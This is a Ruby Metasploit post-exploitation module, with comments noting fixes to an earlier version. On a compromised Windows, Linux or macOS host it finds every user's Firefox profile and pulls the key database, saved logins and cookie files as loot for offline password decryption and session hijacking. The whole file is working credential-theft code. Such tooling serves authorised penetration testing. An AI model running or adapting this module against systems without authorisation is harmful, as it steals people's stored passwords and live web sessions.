##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/file'
require 'msf/core/post/windows/user_profiles'
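# Post module: locate Firefox profiles on the target and pull the files an
# offline decryptor needs (key3.db, signons*, cookies.sqlite) into loot.
#
# Security notes for operators:
# - The loot written by store_loot is credential material (the NSS key
#   database plus the encrypted logins and live session cookies); treat the
#   loot directory accordingly.
# - On shell sessions, directory names returned by `ls` are interpolated
#   unescaped into later `ls`/`cat` commands. A hostile local user on the
#   target who can create a home or profile directory containing shell
#   metacharacters could therefore run commands in the session's context.
#   The paths built here are already shell-escaped fragments (see the
#   "Application\ Support" component), so they cannot simply be passed
#   through Shellwords.escape; review listings before trusting them.
class Metasploit3 < Msf::Post

  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Multi Gather Firefox Signon Credential Collection',
      'Description'  => %q{
        This module will collect credentials from the Firefox web browser if it is
        installed on the targeted machine. Additionally, cookies are downloaded. Which
        could potentially yield valid web sessions.

        Firefox stores passwords within the signons.sqlite database file. There is also a
        key3.db file which contains the key for decrypting these passwords. In cases where
        a Master Password has not been set, the passwords can easily be decrypted using
        third party tools. If a Master Password was used the only option would be to
        bruteforce.
      },
      'License'      => MSF_LICENSE,
      'Author'       => ['bannedit'],
      'Version'      => '$Revision$',
      'Platform'     => ['win', 'linux', 'bsd', 'unix', 'osx'],
      'SessionTypes' => ['meterpreter', 'shell']
    ))
    # TODO: decrypt the collected signons locally when no Master Password is set.
  end

  # Entry point. Works out the platform, enumerates Firefox profile
  # directories for every reachable user and downloads their loot files.
  def run
    print_status("Determining session platform and type...")
    paths = []

    case session.platform
    when /unix|linux|bsd/
      @platform = :unix
      paths = enum_users_unix
    when /osx/
      @platform = :osx
      paths = enum_users_unix
    when /win/
      # check_firefox, got_root? and whoami all branch on :windows; it was
      # never assigned before, so every windows-specific branch was dead.
      @platform = :windows
      unless session.type == "meterpreter"
        print_error "Only meterpreter sessions are supported on windows hosts"
        return
      end
      grab_user_profiles().each do |user|
        next if user['AppData'].nil?
        dir = check_firefox(user['AppData'])
        paths << dir if dir
      end
    else
      print_error("Unsupported platform #{session.platform}")
      return
    end

    # enum_users_unix may return nil; the windows branch may leave an empty
    # array (the original only tested for nil and then ran on nothing).
    paths = Array(paths).flatten.compact
    if paths.empty?
      print_error("No users found with a Firefox directory")
      return
    end

    download_loot(paths)
  end

  # Locate Firefox profile directories on unix-like targets.
  #
  # With root every directory under the home root (plus /root) is walked;
  # otherwise only the current user's profile directory is inspected.
  # Returns an Array of profile directory paths, each ending in "/", or nil
  # when nothing was found.
  #
  # Listings arrive through the shell channel and are split on any
  # whitespace, so home or profile names containing spaces are not handled.
  def enum_users_unix
    id = whoami
    if id.nil? || id.empty?
      print_error("This session is not responding, perhaps the session is dead")
      return nil
    end

    home = (@platform == :osx) ? "/Users/" : "/home/"

    unless got_root?
      print_status("We do not have root privileges")
      print_status("Checking #{id} account for Firefox")
      profile_base = firefox_profile_base(home + id)
      listing = session.shell_command("ls #{profile_base}").to_s.gsub(/\s/, "\n")
      listing.each_line do |profile|
        profile.chomp!
        next if profile =~ /No such file/i
        next unless profile =~ /\.default/
        print_status("Found Firefox Profile for: #{id}")
        return [profile_base + profile + "/"]
      end
      return nil
    end

    # We are root: check every home directory, plus /root itself.
    userdirs = session.shell_command("ls #{home}").to_s.gsub(/\s/, "\n")
    userdirs << "/root\n"

    paths = []
    userdirs.each_line do |entry|
      entry.chomp!
      next if entry.empty? || entry == "." || entry == ".."

      # "/root" was appended as an absolute path; everything else is relative
      # to the home root. Compare exactly — the original matched /root/ and
      # would have misfiled a user named e.g. "groot". Firefox's location
      # differs per platform, which the original ignored for the root walk.
      dir = (entry == "/root") ? "/root/.mozilla/firefox/" : firefox_profile_base(home + entry)
      print_status("Checking for Firefox Profile in: #{dir}")

      stat = session.shell_command("ls #{dir}").to_s
      if stat =~ /No such file/i
        print_error("Mozilla not found in #{dir}")
        next
      end

      stat.gsub(/\s/, "\n").each_line do |profile|
        profile.chomp!
        next unless profile =~ /\.default/
        print_status("Found Firefox Profile in: #{dir + profile}")
        # Keep the trailing separator so download_loot can append file names;
        # the original omitted it here, producing ".../abcd.defaultsignons.sqlite".
        paths << dir + profile + "/"
      end
    end

    paths
  end

  # Directory holding the Firefox profiles under user_home, with a trailing
  # "/" and already escaped for use inside shell_command.
  def firefox_profile_base(user_home)
    if @platform == :osx
      user_home + "/Library/Application\\ Support/Firefox/Profiles/"
    else
      user_home + "/.mozilla/firefox/"
    end
  end

  # Windows: given a user's AppData directory, return the Firefox profile
  # directories beneath AppData\Mozilla\Firefox\Profiles\, or nil when
  # Firefox is not installed for that user or it has no profiles.
  #
  # Presence is detected via profiles.ini. The original additionally walked
  # AppData\Mozilla\ and pushed its first entry (normally ".") — or, had
  # @platform ever been :windows, "...\MozillaFirefoxProfiles\" with a
  # missing separator — onto the result; those bogus paths are gone.
  def check_firefox(path)
    base = path + "\\Mozilla\\"
    print_status("Checking for Firefox directory in: #{base}")

    installed = begin
      session.fs.file.stat(base + "Firefox\\profiles.ini")
      true
    rescue
      false
    end

    unless installed
      print_error("Firefox not found")
      return nil
    end
    print_good("Found Firefox installed")

    print_status("Locating Firefox Profiles...")
    print_line("")
    profiles_dir = base + "Firefox\\Profiles\\"

    # Every entry under Profiles\ is taken to be a profile.
    paths = []
    begin
      session.fs.dir.foreach(profiles_dir) do |entry|
        next if entry == "." || entry == ".."
        print_good("Found Profile #{entry}")
        paths << profiles_dir + entry
      end
    rescue
      print_error("Profiles directory missing")
      return nil
    end

    paths.empty? ? nil : paths
  end

  # Download the interesting files from each profile directory and store each
  # one as loot.
  #
  # Each file gets its own buffer. The original reused one accumulator for
  # the whole run, so every later loot entry also contained the bytes of the
  # earlier ones, and the shell path stored that accumulator (empty) instead
  # of the data it had just read.
  def download_loot(paths)
    paths.each do |path|
      print_status(path)
      profile = path.scan(/Profiles[\\|\/](.+)$/).flatten[0].to_s

      if session.type == "meterpreter"
        # Unix paths carry shell escapes ("Application\ Support"); the fs API
        # wants the raw name. The separator must also match the platform —
        # the original always used "\" even for a linux/osx meterpreter.
        fs_path = (@platform == :windows) ? path : path.gsub("\\ ", " ")
        sep = (@platform == :windows) ? "\\" : "/"
        session.fs.dir.foreach(fs_path) do |file|
          next unless loot_file?(file)
          print_good("Downloading #{file} file from: #{fs_path}")
          full = fs_path.end_with?(sep) ? fs_path + file : fs_path + sep + file
          store_firefox_loot(file, read_remote_file(full), profile)
        end
      else
        files = session.shell_command("ls #{path}").to_s.gsub(/\s/, "\n")
        files.each_line do |file|
          file.chomp!
          next unless loot_file?(file)
          print_good("Downloading #{file} from: #{path}")
          # NOTE: cat over a shell channel is only reliable for text. key3.db
          # and the sqlite databases are binary and may come back mangled;
          # prefer a meterpreter session when the data has to decrypt offline.
          full = path.end_with?("/") ? path + file : path + "/" + file
          data = session.shell_command("cat #{full}").to_s
          store_firefox_loot(file, data, profile)
        end
      end
    end
  end

  # True for the profile files this module collects: the NSS key database,
  # the stored logins (signons.txt / signons*.sqlite) and the cookie store.
  def loot_file?(name)
    !!(name =~ /key\d\.db/ || name =~ /signons/i || name =~ /cookies\.sqlite/)
  end

  # Read a remote file through the meterpreter fs API, always closing the
  # handle. Returns the file contents as a String.
  def read_remote_file(remote_path)
    data = ""
    fd = session.fs.file.new(remote_path)
    begin
      until fd.eof?
        chunk = fd.read
        data << chunk unless chunk.nil?
      end
    rescue EOFError
      # hit end of file between eof? and read; data read so far is complete
    ensure
      fd.close
    end
    data
  end

  # Store one profile file as loot. The type and name derive from the file's
  # basename; the extension comes from File.extname, which works regardless
  # of how many dots the directory part contains (the original split the
  # whole path on "." and took the third element, giving nil for most files).
  def store_firefox_loot(file, data, profile)
    name = file.split(/[\\\/]/).last.to_s
    ext  = File.extname(name).sub(/\A\./, '')
    mime = (ext == "txt") ? "plain" : "binary"
    store_loot("ff.profile.#{name}", "#{mime}/#{ext}", session, data, "firefox_#{name}", "#{name} for #{profile}")
  end

  # True when the session runs as SYSTEM (windows) or exactly root (unix-like).
  # The unix check compares the whole `whoami` output; the original's /root/
  # regex also matched any user whose name merely contained "root".
  def got_root?
    if @platform == :windows
      !!(session.sys.config.getuid =~ /SYSTEM/)
    else # unix, bsd, linux, osx
      whoami == "root"
    end
  end

  # Current user name: %USERNAME% on windows, `whoami` elsewhere. Returns ""
  # rather than raising when the shell gives nothing back.
  def whoami
    if @platform == :windows
      session.fs.file.expand_path("%USERNAME%")
    else
      session.shell_command("whoami").to_s.chomp
    end
  end

end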